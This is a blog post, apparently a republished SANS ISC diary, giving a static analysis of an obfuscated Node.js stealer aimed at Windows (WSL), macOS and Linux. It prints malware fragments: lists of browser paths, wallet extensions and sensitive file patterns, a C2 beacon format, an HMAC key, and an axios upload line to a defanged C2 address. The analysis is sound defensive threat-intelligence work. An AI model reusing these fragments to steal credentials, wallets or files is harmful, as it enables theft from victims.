{"id":3292,"date":"2026-05-22T07:02:56","date_gmt":"2026-05-22T07:02:56","guid":{"rendered":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/22\/cross-platform-npm-stealer-fri-may-22nd\/"},"modified":"2026-05-22T07:02:56","modified_gmt":"2026-05-22T07:02:56","slug":"cross-platform-npm-stealer-fri-may-22nd","status":"publish","type":"post","link":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/22\/cross-platform-npm-stealer-fri-may-22nd\/","title":{"rendered":"Cross-Platform NPM Stealer, (Fri, May 22nd)"},"content":{"rendered":"
\n

I found a Node.js stealer that looked pretty well obfuscated. The file was not running out-of-the-box because it was uploaded on VT as \u201cextracted-decoded.js\u201d (and reformated). The SHA256 is 049300aa5dd774d6c984779a0570f59610399c71864b5d5c2605906db46ddeb9[1<\/a>]. It did not run properly in a sandbox so only a static analysis was performed.<\/p>\n

The key point is that it is a cross-platform stealer targeting Windows (WSL), macOS and Linux. Good news for us, only the \u201cwrapper\u201d that is responsible for the execution is obfuscated but the malicious payloads are embedded in plain text! The obfuscation technique looks typical to the code produced by obfuscation.io[2<\/a>]. We are facing a very long array of small Base64-encoded strings:<\/p>\n

\nfunction c() {\n  const t8 = [\"W54gaGuj\", \"pSkByhzh\", \"WRT\/WPThyG\", \"CSomW6OXWQG\", \"WO7dIuVcTaq\", \"AYb2Axm\", \"WPT3WPJdLmkS\", \"WPTNeuWa\", \n\u00a0 \"hCkIW64XW7C\", \"W47cM0tcObS\", \"WPKbWOKfW74\", \"W6JdNCkDWRe+\", \"W53dLuxcP3u\", \"WRTUc8ocW4W\", \"ysiSica\", \"wCo4oser\", \"tSkAW5v3ca\",\n\u00a0 \"W54XaKvz\", \"W7nTe8ooW7a\", \"W4BcSSo\/FLi\", \"W6HvW7i+FG\", \"W5iBabul\", \"F8oQW4JcVCku\", \"W5ldPCkKbcy\", \"W6ddQcdcNq0\", \"Aw5Niha\",\n  \"Dcy9W5dcVq\", \"C8o\/eqBcHW\", \"id0GBMu\", \"W5FcISkyW4FcJG\", \"WR1ieSotW4y\", \"wSoqq8o1da\", \"B3jKvMe\", \"icDmB2m\", \"uSkgW4qZiq\", \n\u00a0 \"WO7cMSkoW7zX\", \"W5HxW6OnW7S\", \"W4SBWRHwW7e\", \"zwa3W5dcOG\", \"W4PCW79DW6a\", \"omkrngXB\", \"xmkVCWeJ\", \"nCoEWQ1WWR0\", \"WRNcH3vwCG\", \n\u00a0 \"W7lcTSoUCq8\", \"rM9sWR\/cPW\", \"W4ZcKbxcUIC\", \"DgGGDg8\", \"WR7dK8kpWROP\", \"fmo7j1et\", \"id09psa\", \"vSo4Cx4n\", \"iIWImJq\", \"WRrixrpcJq\",\n\u00a0 \"u29JA2u\", \"ve9swsW\", \"WRBdHH3dUa0\", \"W5RcKLpdTuW\", \"u3ruyKK\", \"WOVcLSowW4RcPG\", \"BwuGzgK\", \"ugf0AdO\", \"W63cJ3Kmaa\", \"WPVdRCk1bti\", \n\u00a0 \"DwrVige\", \"C8k2WQxcTh0\", \"igvUDhi\", \"tmkSl1Ld\", \"qqvnW4pcMa\", \"WPNdGahdO0i\", \"nmkQWRNdPNa\", \"WQD8qmodW6G\", \"W4NdK8oBW5pdQq\", \n\u00a0 \"quFcOmoQWRe\", \"Cbyarmkq\", \"tmkoWQHU\", \"ewb8W4eF\", \"vcCOWOPc\", \"WRtdQc3dIrW\", \"WQXIrSoqW5q\", \"kcDqCM8\", \"imkUWQtcPxC\", \n\u00a0 \"bmooW7q6hW\", \n  ...\n<\/pre>\n
Other small functions are low-level decoders that perform a lot\u00a0of arithmetic operations. There are three main payloads that all have their own purpose:<\/p>\n
The first one is a browser credential stealer. It supports: Chrome, Brave, Edge, Opera, Opera GX, Vivaldi, Kiwi, Yandex, Iridium, Comodo Dragon, SRWare Iron, Chromium, AVG Browser.<\/p>\n
\nconst localAppDataBase = `\/mnt\/c\/Users\/${windowsUsername}\/AppData\/Local`;\nconst browserRelativePaths = [\n\u00a0 \"Google\/Chrome\/User Data\",                    \/\/ Chrome\n\u00a0 \"BraveSoftware\/Brave-Browser\/User Data\",      \/\/ Brave\n\u00a0 \"AVG Browser\/User Data\",                      \/\/ AVG Browser\n\u00a0 \"Microsoft\/Edge\/User Data\",                   \/\/ Edge\n\u00a0 \"Opera Software\/Opera Stable\",                \/\/ Opera\n\u00a0 \"Opera Software\/Opera GX\",                    \/\/ Opera GX\n\u00a0 \"Vivaldi\/User Data\",                          \/\/ Vivaldi\n\u00a0 \"Kiwi Browser\/User Data\",                     \/\/ Kiwi\n\u00a0 \"Yandex\/YandexBrowser\/User Data\",             \/\/ Yandex\n\u00a0 \"Iridium\/User Data\",                          \/\/ Iridium\n\u00a0 \"Comodo\/Dragon\/User Data\",                    \/\/ Comodo\n\u00a0 \"SRWare Iron\/User Data\",                      \/\/ SRWare\n\u00a0 \"Chromium\/User Data\"                          \/\/ Chromiumn\n];<\/pre>\n
The malware also looks for interesting wallet Chrome extensions:<\/p>\n
\nconst wps = [\n\u00a0 \"nkbihfbeogaeaoehlefnkodbefgpgknn\",\n  \"ejbalbakoplchlghecdalmeeeajnimhm\",\n  \"acmacodkjbdgmoleebolmdjonilkdbch\",\n  \"bfnaelmomeimhlpmgjnjophhpkkoljpa\", \n  \"ibnejdfjmmkpcnlpebklmnkoeoihofec\",\n  \"egjidjbpglichdcondbcbdnbeeppgdph\",\n  \"nphplpgoakhhjchkkhmiggakijnkhfnd\",\n  \"omaabbefbmiijedngplfjmnooppbclkk\",\n  \"bhhhlbepdkbapadjdnnojkbgioiodbic\",\n  \"aeachknmefphepccionboohckonoeemg\",\n  \"aflkmhkiijdbfcmhplgifokgdeclgpoi\",\n  \"agoakfejjabomempkjlepdflaleeobhb\",\n  \"aholpfdialjgjfhomihkjbmgjidlcdno\",\n  \"afbcbjpbpfadlkmhmclhkeeodmamcflc\",\n  \"cgbogdmdefihhljhfeffkljbghamglni\",\n  \"dmkamcknogkgcdfhhbddcghachkejeap\",\n  \"dlcobpjiigpikoobohmabehhmhfoodbb\",\n  \"efbglgofoippbgcjepnhiblaibcnclgk\",\n  \"ejjladinnckdgjemekebdpeokbikhfci\",\n  \"fhbohimaelbohpjbbldcngcnapndodjp\",\n  \"fhkbkphfeanlhnlffkpologfoccekhic\",\n  \"fhmfendgdocmcbmfikdcogofphimnkno\",\n  \"fldfpgipfncgndfolcbkdeeknbbbnhcc\", \n  \"gjnckgkfmgmibbkoficdidcljeaaaheg\",\n  \"hifafgmccdpekplomjjkcfgodnhcellj\",\n  \"hmeobnfnfcmdkdcmlblgagmfpfboieaf\",\n  \"hnfanknocfeofbddgcijnmhnfnkdnaad\",\n  \"jiidiaalihmmhddjgbnbgdfflelocpak\",\n  \"jblndlipeogpafnldhgmapagcccfchpi\",\n  \"jmbkjchcobfffnmjboflnchcbljiljdk\",\n  \"jnjpmcgfcfeffkfgcnjefkbkgcpnkpab\", \n  \"kpkmkbkoifcfpapmleipncofdbjdpice\",\n  \"khpkpbbcccdmmclmpigdgddabeilkdpd\",\n  \"ldinpeekobnhjjdofggfgjlcehhmanaj\", \n  \"lgmpcpglpngdoalbgeoldeajfclnhafa\", \n  \"mcohilncbfahbmgdjkbpemcciiolgcge\",\n  \"mopnmbcafieddcagagdcbnhejhlodfdd\", \n  \"nkklfkfpelhghbidbnpdfhblphpfjmbo\", \n  \"penjlddjkjgpnkllboccdgccekpkcbin\", \n  \"ppbibelpcjmhbdihakflkdcoccbgbkpo\"\n]<\/pre>\n
Data is exfiltrated to port 8085.<\/p>\n
The second one is a recursive file exfiltration scanner. It scans the victim\u2019s filesystem and search for sensitive files by name\/extension.<\/p>\n
\nconst SENSITIVE_FILE_PATTERNS = [\n\u00a0 \".keystore\", \"phone\", \"database\",\"bank\", \"financ\",\".env\",\"env\",\"environment\",\"config\",\"configuration\",\"configure\",\".conf\",\n  \".cfg\",\".ini\",\".properties\",\".yaml\",\".yml\",\".toml\",\"metamask\",\"phantom\",\"bitcoin\",\"ethereum\",\"eth\",\"trust\",\n  \"wallet\",\"coinbase\",\"exodus\",\"ledger\",\"trezor\",\"keystore\",\"keyring\",\"keychain\",\"atomic\",\"electrum\",\"mycelium\",\n  \"blockchain\",\"bravewallet\",\"rabby\",\"coin98\",\"backpack\",\"core\",\"mathwallet\",\"solflare\",\"glow\",\"keplr\",\"argent\",\n  \"martian\",\"petra\",\"binance\",\"okx\",\"crypto\",\"cryptocurrency\",\"hardhat\",\"truffle\",\"private\",\"privatekey\", \"private_key\",\n\u00a0 \"private-key\",\"privkey\",\"priv_key\",\"key\",\"keypair\",\"key_pair\",\"keypair\",\".pem\",\".p12\",\".pfx\",\".jks\",\"keystore\",\".keys\",\n  \"keys\",\".p8\",\".p7b\",\".p7c\",\".cer\",\".crt\",\".cert\",\"cert\",\".der\",\"id_rsa\",\"id_dsa\",\"id_ecdsa\",\"id_ed25519\",\".pub\",\n  \".priv\",\"seed\",\"seedphrase\",\"seed_phrase\",\"seed-phrase\",\"mnemonic\",\"phrase\",\"passphrase\",\"pass_phrase\",\n  \"pass-phrase\",\"recovery\",\"recoveryphrase\",\"recovery_phrase\",\"recovery-phrase\",\"backup\",\"backupphrase\",\"backup_phrase\",\n  \"backup-phrase\",\"12words\",\"12_words\",\"12words\",\"24words\",\"24_words\",\"24words\",\"bip39\",\"bip44\",\"password\",\"passwd\",\"pass\",\"pwd\",\n  \"credential\",\"credentials\",\"auth\",\"authentication\",\"token\",\"access_token\",\"refresh_token\",\"api_key\",\"apikey\",\"api-key\",\n  \"apisecret\",\"api_secret\",\"api-secret\",\"secret\",\"secrets\",\"secretkey\",\"secret_key\",\"secret-key\",\"masterkey\",\"master_key\",\n  \"master-key\",\"masterpassword\",\"master_password\",\"master-password\",\"account\",\"accounts\",\"profile\",\"profiles\",\"user\",\n  \"username\",\"user_name\",\"user-name\",\"login\",\"signin\",\"sign_in\",\"sign-in\",\"address\",\"addresses\",\"tx\",\"transaction\",\"transactions\",\n  \".db\",\".sqlite\",\".sqlite3\",\".sql\",\".mdb\",\".accdb\",\".dbf\",\".doc\",\".docx\",\".pdf\",\".md\",\".markdown\",\".rtf\",\".odt\",\n  \".xls\",\".xlsx\",\".txt\",\"text\",\"note\",\"notes\",\"memo\",\"memos\",\"screenshot\",\"screen\",\"snapshot\",\"capture\",\".png\",\".jpg\",\n  \".jpeg\",\".bmp\",\".json\",\".js\",\".ts\",\".jsx\",\".tsx\",\".csv\",\".xml\",\".lock\",\".log\",\".bak\",\"backup\",\".old\",\".orig\",\".save\", \n\u200b\u200b\u200b\u200b\u200b  \".swp\",\".tmp\",\"tmp\",\"my\",\"personal\",\"vault\",\"safe\",\"secure\",\"lock\",\"encrypt\",\"decrypt\",\"signature\",\"sign\",\"certificate\",\n  \"cert\",\"identity\",\"session\",\"cookie\"\n];<\/pre>\n
Interesting files are exfiltrated via port 8086.<\/p>\n
Finally, the third module implements a WebSocket\u00a0connection to the C2 server (port 8087) with reverse-shell capabilities. Upon the first connection the following info is sent to the C2 via a POST reques to hxxp:\/\/216[.]126[.]225[.]243:8087\/api\/notify<\/p>\n
\n{ \n\u00a0 \"ukey\": 504, \n\u00a0 \"t\": 5, \n\u00a0 \"host\": \"504_<hostname>\", \n\u00a0 \"os\": \"<type> <release>\", \n\u00a0 \"username\": \"<username>\", \n\u00a0 \"timestamp\":<unix_ts>\n}<\/pre>\n
All communications (on different ports) are made with the IP address %%ip:216.126.225.243%%. This IP address is known as a DPRK OtterCookie C2[3<\/a>]. Note that if the execution module is pretty well obfuscated, the key used to encrypt data is available in plain text:<\/p>\n
\nconst X = crypto.createHmac(\"sha256\", \"SuperStr0ngSecret@)@^\").update(l).digest(\"hex\");<\/pre>\n
Also, all HTTP communications are performed via the Axios[4<\/a>] NPM package:<\/p>\n
\nconst response = await axios.post(`\" + \"hxxp:\/\/216[.]126[.]225[.]243:8086\/upload\" + \"`, form, { ...<\/pre>\n
[1]\u00a0https:\/\/www.virustotal.com\/gui\/file\/049300aa5dd774d6c984779a0570f59610399c71864b5d5c2605906db46ddeb9<\/a>
\n[2]\u00a0https:\/\/obfuscator.io<\/a>
\n[3] https:\/\/socket.dev\/blog\/north-korea-contagious-interview-npm-attacks<\/a>
\n[4]\u00a0https:\/\/github.com\/axios\/axios<\/a><\/p>\n
Xavier Mertens (@xme)
\nXameco
\nSenior ISC Handler – Freelance Cyber Security Consultant
\nPGP Key<\/a><\/p>\n
 (c) SANS Internet Storm Center. https:\/\/isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.<\/p><\/div>\n","protected":false},"excerpt":{"rendered":"
I found a Node.js stealer that looked pretty well obfuscated. The file was not running out-of-the-box because it was uploaded on VT as \u201cextracted-decoded.js\u201d (and reformated). The SHA256 is 049300aa5dd774d6c984779a0570f59610399c71864b5d5c2605906db46ddeb9[1]. It did not run properly in a sandbox so only a static analysis was performed. The key point is that it is a cross-platform stealer […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"categories":[90],"tags":[91],"class_list":["post-3292","post","type-post","status-publish","format-standard","hentry","category-cybersecurity","tag-cybersecurity"],"yoast_head":"\nCross-Platform NPM Stealer, (Fri, May 22nd) - Imperative Business Ventures Limited<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/22\/cross-platform-npm-stealer-fri-may-22nd\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Cross-Platform NPM Stealer, (Fri, May 22nd) - Imperative Business Ventures Limited\" \/>\n<meta property=\"og:description\" content=\"I found a Node.js stealer that looked pretty well obfuscated. The file was not running out-of-the-box because it was uploaded on VT as \u201cextracted-decoded.js\u201d (and reformated). The SHA256 is 049300aa5dd774d6c984779a0570f59610399c71864b5d5c2605906db46ddeb9[1]. It did not run properly in a sandbox so only a static analysis was performed. The key point is that it is a cross-platform stealer […]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/22\/cross-platform-npm-stealer-fri-may-22nd\/\" \/>\n<meta property=\"og:site_name\" content=\"Imperative Business Ventures Limited\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-22T07:02:56+00:00\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/22\/cross-platform-npm-stealer-fri-may-22nd\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/22\/cross-platform-npm-stealer-fri-may-22nd\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\"},\"headline\":\"Cross-Platform NPM Stealer, (Fri, May 22nd)\",\"datePublished\":\"2026-05-22T07:02:56+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/22\/cross-platform-npm-stealer-fri-may-22nd\/\"},\"wordCount\":372,\"keywords\":[\"Cybersecurity\"],\"articleSection\":[\"Cybersecurity\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/22\/cross-platform-npm-stealer-fri-may-22nd\/\",\"url\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/22\/cross-platform-npm-stealer-fri-may-22nd\/\",\"name\":\"Cross-Platform NPM Stealer, (Fri, May 22nd) - Imperative Business Ventures Limited\",\"isPartOf\":{\"@id\":\"https:\/\/blog.ibvl.in\/#website\"},\"datePublished\":\"2026-05-22T07:02:56+00:00\",\"author\":{\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\"},\"breadcrumb\":{\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/22\/cross-platform-npm-stealer-fri-may-22nd\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/22\/cross-platform-npm-stealer-fri-may-22nd\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/22\/cross-platform-npm-stealer-fri-may-22nd\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/blog.ibvl.in\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Cross-Platform NPM Stealer, (Fri, May 22nd)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/blog.ibvl.in\/#website\",\"url\":\"https:\/\/blog.ibvl.in\/\",\"name\":\"Imperative Business Ventures Limited\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/blog.ibvl.in\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/blog.ibvl.in\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"sameAs\":[\"https:\/\/blog.ibvl.in\"],\"url\":\"https:\/\/blog.ibvl.in\/index.php\/author\/admin_hcbs9yw6\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Cross-Platform NPM Stealer, (Fri, May 22nd) - Imperative Business Ventures Limited","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/22\/cross-platform-npm-stealer-fri-may-22nd\/","og_locale":"en_US","og_type":"article","og_title":"Cross-Platform NPM Stealer, (Fri, May 22nd) - Imperative Business Ventures Limited","og_description":"I found a Node.js stealer that looked pretty well obfuscated. The file was not running out-of-the-box because it was uploaded on VT as \u201cextracted-decoded.js\u201d (and reformated). The SHA256 is 049300aa5dd774d6c984779a0570f59610399c71864b5d5c2605906db46ddeb9[1]. It did not run properly in a sandbox so only a static analysis was performed. The key point is that it is a cross-platform stealer […]","og_url":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/22\/cross-platform-npm-stealer-fri-may-22nd\/","og_site_name":"Imperative Business Ventures Limited","article_published_time":"2026-05-22T07:02:56+00:00","author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"admin","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/22\/cross-platform-npm-stealer-fri-may-22nd\/#article","isPartOf":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/22\/cross-platform-npm-stealer-fri-may-22nd\/"},"author":{"name":"admin","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02"},"headline":"Cross-Platform NPM Stealer, (Fri, May 22nd)","datePublished":"2026-05-22T07:02:56+00:00","mainEntityOfPage":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/22\/cross-platform-npm-stealer-fri-may-22nd\/"},"wordCount":372,"keywords":["Cybersecurity"],"articleSection":["Cybersecurity"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/22\/cross-platform-npm-stealer-fri-may-22nd\/","url":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/22\/cross-platform-npm-stealer-fri-may-22nd\/","name":"Cross-Platform NPM Stealer, (Fri, May 22nd) - Imperative Business Ventures Limited","isPartOf":{"@id":"https:\/\/blog.ibvl.in\/#website"},"datePublished":"2026-05-22T07:02:56+00:00","author":{"@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02"},"breadcrumb":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/22\/cross-platform-npm-stealer-fri-may-22nd\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/blog.ibvl.in\/index.php\/2026\/05\/22\/cross-platform-npm-stealer-fri-may-22nd\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/22\/cross-platform-npm-stealer-fri-may-22nd\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/blog.ibvl.in\/"},{"@type":"ListItem","position":2,"name":"Cross-Platform NPM Stealer, (Fri, May 22nd)"}]},{"@type":"WebSite","@id":"https:\/\/blog.ibvl.in\/#website","url":"https:\/\/blog.ibvl.in\/","name":"Imperative Business Ventures Limited","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/blog.ibvl.in\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02","name":"admin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g","caption":"admin"},"sameAs":["https:\/\/blog.ibvl.in"],"url":"https:\/\/blog.ibvl.in\/index.php\/author\/admin_hcbs9yw6\/"}]}},"_links":{"self":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts\/3292","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/comments?post=3292"}],"version-history":[{"count":0,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts\/3292\/revisions"}],"wp:attachment":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/media?parent=3292"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/categories?post=3292"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/tags?post=3292"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}